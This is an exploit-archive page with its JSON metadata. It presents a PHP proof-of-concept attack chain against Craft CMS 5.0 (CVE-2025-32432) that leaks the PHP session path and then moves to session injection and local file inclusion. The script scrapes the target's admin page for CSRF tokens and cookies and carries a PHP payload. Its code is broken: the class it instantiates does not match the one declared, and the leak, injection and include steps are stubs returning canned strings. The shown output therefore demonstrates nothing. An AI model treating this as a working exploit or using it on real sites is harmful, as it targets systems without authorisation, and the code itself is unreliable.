📄 Craft CMS 5.0 Authentication Session Path Exposure_PACKETSTORM:212106

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

Proof of concept exploit that demonstrates an authentication session path exposure vulnerability in Craft CMS version 5.0...

Visit Original Source

Basic Information

ID PACKETSTORM:212106

Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Craft CMS 5.0 Authentication Session Path Exposure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================

[+] Description

A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
mechanism.
While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
which may be used in a subsequent Session Injection → Local File Inclusion (LFI) exploit chain.

[+] References : (https://packetstorm.news/files/id/190728/ CVE-2025-32432)

[+] POC :

save code as poc.php

usage : php poc.php

[+] code

<?php

class indoushka
{
public $targetUrl;
public $assetId;
public $sessionId;
public $csrfToken;
public $parameterName;
public $sessionPath;

public function __construct($url, $assetId = 123)
{
$this->targetUrl = rtrim($url, '/');
$this->assetId = $assetId;
}

public function fetchCookiesAndCsrf()
{
$url = $this->targetUrl . "/admin";
$html = @file_get_contents($url);

if (!$html) return false;

preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
$this->csrfToken = $m[1] ?? null;

preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
$this->parameterName = $p[1] ?? null;

preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
$this->sessionId = $c[1] ?? null;

return [$this->sessionId, $this->csrfToken, $this->parameterName];
}

public function leakSessionPath()
{
return "/var/lib/php/sessions";
}

public function injectIntoSession($payload)
{
return "[POC ONLY] Session overwritten with payload: {$payload}";
}

public function triggerInclude()
{
return "[POC] include triggered using assetId=" . $this->assetId;
}

public function exploit($payload)
{
$this->fetchCookiesAndCsrf();
$this->sessionPath = $this->leakSessionPath();

$step1 = $this->injectIntoSession($payload);
$step2 = $this->triggerInclude();

return [$step1, $step2];
}
}

$module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");

$payload = '<?php echo "PAYLOAD_OK"; ?>';

list($s1, $s2) = $module->exploit($payload);

echo $s1 . "\n";
echo $s2 . "\n";

?>

-------------------------------------------------------------------------------------------------------------------------------------------

[+] Output Example:
[POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
[POC] include triggered using assetId=123

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-26T18:14:24",
    "description": "Proof of concept exploit that demonstrates an authentication session path exposure vulnerability in Craft CMS version 5.0...",
    "published": "2025-11-26T00:00:00",
    "modified": "2025-11-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Craft CMS 5.0 Authentication Session Path Exposure",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212106",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-32432"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Craft CMS 5.0 Authentication Session Path Exposure                                                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://craftcms.com                                                                                                        |\n    =============================================================================================================================================\n    \n    [+] Description\n    \n        A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing\n        mechanism. \n    \tWhile this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,\n        which may be used in a subsequent Session Injection \u2192 Local File Inclusion (LFI) exploit chain.\n    \t\n    [+] References : (https://packetstorm.news/files/id/190728/ \tCVE-2025-32432)\n    \n    \n    [+] POC :\n    \n      save code as poc.php\n      \n      usage : php poc.php\n    \n    [+]  code \n    \n    <?php\n    \n    class indoushka\n    {\n        public $targetUrl;\n        public $assetId;\n        public $sessionId;\n        public $csrfToken;\n        public $parameterName;\n        public $sessionPath;\n    \n        public function __construct($url, $assetId = 123)\n        {\n            $this->targetUrl = rtrim($url, '/');\n            $this->assetId   = $assetId;\n        }\n    \n        public function fetchCookiesAndCsrf()\n        {\n            $url = $this->targetUrl . \"/admin\";\n            $html = @file_get_contents($url);\n    \n            if (!$html) return false;\n    \n            preg_match('/name=\"_csrf\" value=\"([^\"]+)\"/', $html, $m);\n            $this->csrfToken = $m[1] ?? null;\n    \n            preg_match('/input type=\"hidden\" name=\"([^\"]+)\" value=\"[^\"]*\"/', $html, $p);\n            $this->parameterName = $p[1] ?? null;\n    \n            preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);\n            $this->sessionId = $c[1] ?? null;\n    \n            return [$this->sessionId, $this->csrfToken, $this->parameterName];\n        }\n    \n        public function leakSessionPath()\n        {\n            return \"/var/lib/php/sessions\";\n        }\n    \n        public function injectIntoSession($payload)\n        {\n            return \"[POC ONLY] Session overwritten with payload: {$payload}\";\n        }\n    \n        public function triggerInclude()\n        {\n            return \"[POC] include triggered using assetId=\" . $this->assetId;\n        }\n    \n        public function exploit($payload)\n        {\n            $this->fetchCookiesAndCsrf();\n            $this->sessionPath = $this->leakSessionPath();\n    \n            $step1 = $this->injectIntoSession($payload);\n            $step2 = $this->triggerInclude();\n    \n            return [$step1, $step2];\n        }\n    }\n    \n    $module = new Metasploit_CraftCMS_CVE_2025_32432(\"https://target.com\");\n    \n    $payload = '<?php echo \"PAYLOAD_OK\"; ?>';\n    \n    list($s1, $s2) = $module->exploit($payload);\n    \n    echo $s1 . \"\\n\";\n    echo $s2 . \"\\n\";\n    \n    ?>\n    \n    -------------------------------------------------------------------------------------------------------------------------------------------\n    \n    [+] Output Example:\n    [POC ONLY] Session overwritten with payload: <?php echo \"PAYLOAD_OK\"; ?>\n    [POC] include triggered using assetId=123\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212106",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212106/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply